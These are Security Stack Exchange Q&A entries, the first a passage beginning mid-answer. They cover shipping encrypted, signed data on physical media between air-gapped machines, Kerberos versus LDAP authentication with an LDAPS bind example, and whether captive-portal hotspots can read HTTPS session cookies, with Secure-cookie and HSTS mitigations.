Fortunately, asymmetric encryption greatly helps, since the leak of these keys will have no deep impact, but it will be of no help against impersonation or tampering occurring at this step. The chosen data exchange medium may have some importance, since each presents different characteristics: firmware-based storage devices are the most frequent nowadays, ranging from hard disks with higher data volumes to micro SD cards which can be very easily concealed. One may prefer to buy them from a physical store to avoid any initial tampering, but as we will see later the device will in any case no longer be trustworthy once the first shipment has occurred. Non-firmware-based devices obviously present no firmware-related issues, but depending on the exact needs of Alan and Bob they may present other issues, in particular pertaining to anonymity: burned disks and printed paper, for instance, may contain unique identifiers allowing them to be linked to their author (such identifiers do not allow the author to be located, though, but once his equipment has been seized they can be used to prove that this equipment produced them). Of course the data will need to be properly encrypted and signed before being stored on the medium. I would tend to prefer an encrypted file, which can be more easily manipulated than an encrypted partition used directly on the medium. I strongly suggest that the data be properly backed up before being sent. While such a transfer is secure in the sense that a potential opponent will not be able to access or tamper with the data even if he manages to intercept it, the data may still get lost or disappear (this can be the result of either a voluntary or involuntary action: it happens that parcels get lost or seized without any intervention from Big Brother, and Murphy is very good at that too!). Methods to obfuscate the actual sender and recipient (from PO boxes to more advanced stuff), when combined with concealment of the storage device, can help to avoid interception. At least on the recipient side, I strongly advise not connecting the received storage device directly to the main computer, but instead: connect the received media to a specially hardened minimal system (aka a sheep dip; the host itself may have no hard disk and boot from a LiveCD) where you will be able to quickly inspect the media content and the encrypted file (do not decrypt it on this host!). You may possibly want to copy the encrypted file to a more trusted medium (here is one case where using an encrypted file instead of an encrypted partition can be useful). Moving the encrypted file to another medium may be especially useful if using a firmware-based storage device since, once it has gone through the postal service, you cannot guarantee the firmware's integrity anymore (while the encrypted data is signed, there is no signature you can check for the rest of the storage device). Then you can connect this more trusted medium to your main air-gapped computer, where you will be able to safely decrypt it, making this step the end of the story :).
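A minimal sketch of the "encrypt and sign before it touches the removable medium" step, driving an existing GnuPG installation from Python (the recipient key and paths are placeholders, and Alan's private key of course never leaves his offline machine):

    import subprocess

    SRC = "report.tar"                     # plaintext to ship
    OUT = "/media/sdcard/report.tar.gpg"   # destination on the removable medium
    RECIPIENT = "bob@example.org"          # Bob's public key, imported beforehand

    subprocess.run(
        ["gpg", "--output", OUT, "--encrypt", "--sign", "--recipient", RECIPIENT, SRC],
        check=True,
    )
    # Bob later verifies and decrypts with:  gpg --output report.tar --decrypt report.tar.gpg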
{ "source": [ "https://security.stackexchange.com/questions/109477", "https://security.stackexchange.com", "https://security.stackexchange.com/users/29193/" ] }
109,565
Can anyone describe/outline the relative merits of using Kerberos or LDAP for authentication in a large heterogeneous environment? And can we switch between them transparently?
Where possible, use Kerberos authentication above all else. It was built for providing authentication/authorization and is the most secure option; the whole premise is to exchange credentials in an environment that isn't trusted. LDAP can easily be misconfigured to send credentials in clear text over the network. An easy way to prevent this is to always use LDAPS (TCP 636), as it encapsulates all traffic in SSL/TLS. LDAP is often used for ad hoc authentication/authorization, especially by web applications using forms authentication.
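If you do end up using LDAP for authentication anyway, at least make sure the bind happens over LDAPS. A sketch with the third-party ldap3 library (host, DN and password are placeholders; for real use you should also pass a Tls object so the server certificate is actually validated):

    from ldap3 import Server, Connection

    server = Server("ldaps://dc.example.com", port=636, use_ssl=True)
    conn = Connection(
        server,
        user="CN=Alice Example,OU=Users,DC=example,DC=com",
        password="s3cr3t-placeholder",
        auto_bind=True,  # raises on failure, so reaching the next line means the bind succeeded
    )
    print("authenticated as:", conn.extend.standard.who_am_i())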
{ "source": [ "https://security.stackexchange.com/questions/109565", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95433/" ] }
109,568
I have a security concern. As we know, many public hotspots redirect you to a login screen when you try to browse to your first web site. For example, if I connect to such a hotspot and then visit https://www.facebook.com (from a computer where I'm already logged in to that site) I get redirected to the hotspot login screen, without any certificate warning in my browser. Obviously, the initial HTTPS request made by my browser contains my session cookie (the "Cookie:" HTTP header). While performing the redirection to the login screen (ICMP- or DNS-based redirection), will the hotspot know the content of my HTTPS request, and therefore my session cookie? I assume that a malicious hotspot can read my first HTTPS request: when the browser tries to connect to facebook.com:443, it will perform the certificate handshake; the hotspot will reply with a valid IP-based certificate, so the hotspot will impersonate "facebook.com" and will read my original HTTPS request content; after that, it may reply with a 301/302 redirect to the hotspot's HTTPS login screen, without any warning in the browser. In this way, would it be possible for a hotspot to know the content of the first HTTPS request?
If you visit HTTPS sites and get redirected without any warnings, then the problem is that your browser doesn't correctly validate certificates - a good browser would display a warning, as the captive portal's certificate does not contain the domain you wanted to visit in its common name field. A possible vulnerability would be if you visited the site over HTTP, but there are solutions to mitigate this, such as the Secure flag on cookies, which tells the browser not to send the cookie over HTTP, and HSTS, which makes the browser automatically convert your HTTP requests to the site into HTTPS requests, in addition to preventing you from bypassing the certificate error if an HTTPS connection can't be made.
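On the site side, those two mitigations boil down to one cookie flag and one response header. A Flask sketch (hypothetical app; the HSTS max-age of one year is an arbitrary choice):

    from flask import Flask, make_response

    app = Flask(__name__)

    @app.route("/login", methods=["POST"])
    def login():
        resp = make_response("logged in")
        # Never send the session cookie over plain HTTP, and hide it from scripts.
        resp.set_cookie("session", "opaque-session-id", secure=True, httponly=True)
        return resp

    @app.after_request
    def add_hsts(resp):
        # Tell returning browsers to upgrade all future requests to this site to HTTPS.
        resp.headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains"
        return resp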
{ "source": [ "https://security.stackexchange.com/questions/109568", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95841/" ] }